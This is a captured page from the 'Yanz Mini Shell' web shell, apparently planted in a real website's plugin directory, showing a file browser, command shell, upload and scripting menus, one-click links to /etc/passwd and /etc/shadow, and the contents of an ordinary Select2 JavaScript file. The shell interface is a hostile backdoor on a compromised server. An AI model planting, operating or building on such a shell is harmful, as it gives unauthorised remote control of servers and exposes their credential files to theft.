Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * Selects & Tags */ 'use strict'; $(function () { const selectPicker = $('.selectpicker'), select2 = $('.select2'), select2Icons = $('.select2-icons'); // Bootstrap Select // -------------------------------------------------------------------- if (selectPicker.length) { selectPicker.selectpicker(); handleBootstrapSelectEvents(); } // Select2 // -------------------------------------------------------------------- // Default if (select2.length) { select2.each(function () { var $this = $(this); select2Focus($this); $this.wrap('<div class="position-relative"></div>').select2({ placeholder: 'Select value', dropdownParent: $this.parent() }); }); } // Select2 Icons if (select2Icons.length) { // custom template to render icons function renderIcons(option) { if (!option.id) { return option.text; } var $icon = "<i class='" + $(option.element).data('icon') + " me-2'></i>" + option.text; return $icon; } select2Focus(select2Icons); select2Icons.wrap('<div class="position-relative"></div>').select2({ dropdownParent: select2Icons.parent(), templateResult: renderIcons, templateSelection: renderIcons, escapeMarkup: function (es) { return es; } }); } });
Free Space : 11139006464 Byte